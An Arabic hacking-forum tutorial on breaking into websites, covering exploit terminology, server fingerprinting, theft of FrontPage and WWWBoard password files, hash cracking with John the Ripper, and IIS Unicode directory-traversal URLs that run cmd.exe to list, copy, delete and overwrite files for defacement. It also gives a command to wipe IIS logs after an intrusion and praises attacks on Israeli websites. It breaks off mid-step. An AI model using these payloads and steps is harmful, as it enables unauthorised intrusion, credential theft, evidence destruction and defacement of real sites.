قسم الشبكاتقسمالشبكات..منتدى متخصص بكل ما يتعلق بالشبكات السلكية والاسلكية وكذلك البرامج الخاصة بها وطريقة التعامل معها بالإضافة الى المشاكل والحلول لها كما يتضمن القسم دروس ودورات فى هذا المجال
و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.
برامج السكان: (Scanner) - 2
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة،
Shadow Security Scanner و Stealth و Omran Fast
هذه البرامج، برنامج
Scanner
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI
اكسبلويت: (Exploits) - 3
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
الجدار الناري: (Firewall) - 4
هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة.
هو ملف الباسورد المظلل: (Token) - 5
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
Shadow file
تجده في
/etc/shadow
Anonymous - 6
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.
Vulnerabilities - 7
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.
: ملف الباسوورد(passwd file) - 8
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
الجذر: (root) - 9
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
السيرفر: (Server) - 10
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون المواقع شغالة 24 على الإنترنت .
قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)
بوفر أوفر فلو: ( Buffer over Flow ) - 11
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر .
- 12 BOX
كثير من الهكرز يحبون ان يطلقوا على كل من ال
pc , servers , supercomputers
هذه الكلمة - BOX
super user
13- النظام المراد اختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
تسطيع ان تطلق على المدير هناك كلمه
super user
وهو يكون روت
وهو الادمين او المدير على النظام....
14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس.
15- بعد اختراق موقع يتم مسح الخطوات ؟/c+del+c:/winnt/system32/logfiles/*.log
نكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة
*
وامتدادة
log
16- لتغيير صفحة البداية ؟
يتم تغير الصفحه الرئيسه عندما يتم الحصول على الباسورد الخاص بالموقع ثم الدخول عليه ثم ملف يدعى
index
افتحوا او الغيه و استبدله ب ملف بنفس الاسم باستخدام برنامج
WS_FTP PRO
مع الاخذ بعين الاعتبار ضرورة تعلم طريقة عمل لوحة التحكم او مايسمى كنترول بانل والوقوف على اسلوب السيطرة على كيفية تحميل وتبديل صفحات الموقع والذي تجده في برنامجنا الكاتب سوفت
17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
هذه من أفضل برامج البحث عن الثغرات :
اضغط وحمله
1 - N-Stealth
شرح استخدام البرنامج
أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
**************************************************
2- Shadow Security Scanner معرب
شرح استخدام البرنامج
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
**************************************************
3- Omran Scanner
برنامج عربي من لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
Linux-Unix-NT
**************************************************
4- CGI Scanner
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك
الملقمات اشهرها اثنين:
IIS:
من مايكروسوفت وهي مليئة ثغرات. ( ومواقع قليل مقفلة ثغراتها ).
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.
19- اول خطوة في الاختراق هي المعلومات: هو معرفة امكانيات ونظام التشغيل ومواصفات الملقم العامل والخدمات اللي يدعمها.
يمكنك الحصول على هذه المعلومات من الموقع [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] ملاحظة: نكتب الموقع من غير
http://
وبدون
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] is running Microsoft-IIS/5.0 on Windows 2000
حصلنا على التالي
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000
هناك مسالة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح ولا تعمل إلا مع ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
لنفترض انه بدون ثغرات؟
نبحث في محتويات الموقع نفسه
هل لديه سجل زوار او منتدى او ....
2 - مثال على ملقمات اباتشي:
ناخذ مثال موقع xxxx [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
The site [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليئة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux
دعم الفرونت بيج كما ذكر الفرونت بيج مليء ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
_vti_pvt
و
_private
هي التي نحتاجها داخل المجلدين سوف نشاهد اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو استطعنا تحميل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة وسنجد السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع xxxx [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
الآن
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
و وكيف ينفك؟
ينفك ببرنامج اسمه
john the repaier
( شرح الاستخدام )
طيب نعود للفقرة الثالثة واللي هي النظام كما شاهدنا النظام هو لينكس لكن اي لينكس ؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه لا تعمل إلا عاللينكس فقط
bin خاص بالملفات الثنائيه يعني اللي تشغل النظام
etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd
dev ملفات الاجهزه
lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل
tmp الملفات الموقته او غير الثابته
usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام
22- (اوامر الاف تي بي)
Pwd
لكي تعرف ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب حق جهازك
مثال
Get black.exe
Put
العملية العكسية ل
Get
يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname
c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او Shell Account
25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
26 -( كيف تحصل على شيل اكاونت مجانا )و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت
- 27تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج
.TFTP-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:\
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية
وهو البرنامج اللازم لعمل الاب لود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لقراءة البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
\inetpub\wwwroot\
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر
- 28تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
أو [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.
30- كيف اتاكد ان الثغرة شغالة ؟- جرب اللثغرة بواسطة الـ
URL او الـ URI .
----------------------------------------------------------------
31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟(IIS4.0 on WinNT) [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
(IIS5.0 on Win2000) [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
----------------------------------------------------------------
32 - ما الفرق بين ملف الباسورد المشفرencryption
والمضلل
shadowed?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملف المضلل
shadow file
يكون مكان كلمة المرور رمز مثل
*
أو
x
أو
#
أو
!
وهذا مثال لها
root:x:0:1:Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw
33 و ماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير.
ثالثا :
34 -اذا كان ملفpasswd
مضلل ماذا تفعل؟
الان جميع ملفات
passwd
تكون مضللة ولكن توجد طريقة لفكها
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
shadow
ماهي اماكن تواجد ملف
shadow
في الأنظمة؟
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي:
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
token
تعني الرمز الذي يوجد في الملف
passwd
وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في
/etc/security/passwd
، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه).
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف
shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رايبر وصلة البرنامج
**********************************************
**********************************************
انتبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو
unshadow passwd.txt shadow.txt
اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة
x
التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x
تكون في ملف الباس
-------------------------------------------------------------------
35- فك تشفير ملف
shadow
asswd بعد دمجه مع ملف
x وهو طريقة فك تشفير ملف
passwd
الدليل الكامل لكسر كلمات السر
برنامج
John the Ripper
لكسر كلمات السر
-----------------------------------------------------------------
36 - برنامج (John the Ripper)
احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
(nix*)
وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
(PASSWD)
بان يكون مضلل وعلى المخترق الحصول على ملف
(SHADOW)
لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
----------------------------------------------------------------
37 - كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب
ftp
يمكنك استخدام احد برامج ال
ftp
منها
ws_ftp
او
CuteFTP 4.2.5 Build 10.4.1
وهو موجود في برنامجنا هكرز فول
---------------------------------------------------------------------
38 - طريقة تنفيذ الثغرات:
مكان تنفيذ الثغرات [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
Dir
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
--------------------------------------------------------------------
2-(شرح الثغرات واستغلالها)
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:
ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف
ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:
ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] --------------------------------------------------------------------
3 - شرح ثغرة سي جي اي وكيفية استغلالها:
CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] فتكتب الثغرة هكذا في المتفح [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd
اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
../../../../../etc/resolv.conf%00.html&passurl=/ca tegory/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:
IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
********************************************** [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ][ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] +c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../w innt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/ cmd.exe?/c+dir+c:
*************************************************
طريقه استغلال ثغرات اي اي اس بكذى طريقه
يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال
cmd.exe
لتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر: [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d ir+c:
-----------------------------------------------------------------------------------
امر انشاء دليل جديد [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+m d+cJ
-----------------------------------------------------------------------------------
امر الغاء دليل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+r d+cJ
الامر المستخدم للنسخ [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+c opy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
الامر المستخدم للحذف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+m d+c:inetpubwwwrootindex.asp
الامر المستخدم لتغيير مسمى الملف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+r en+cJ.htm+DJKING.htm
لامر المستخدم لرؤية محتويات الملف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+t ype+c:index.htm
الامر المستخدم للكتابة داخل أي ملف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+e cho+HACKED+BY+DJ+KING+>+cJ.txt
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
[ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c+copy+c:winntsystem32cmd.exe+c:inetpubscripts D J.exe
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] om+>+c:inetpubwwwrootindex.htm
ملاحظة هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP
سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
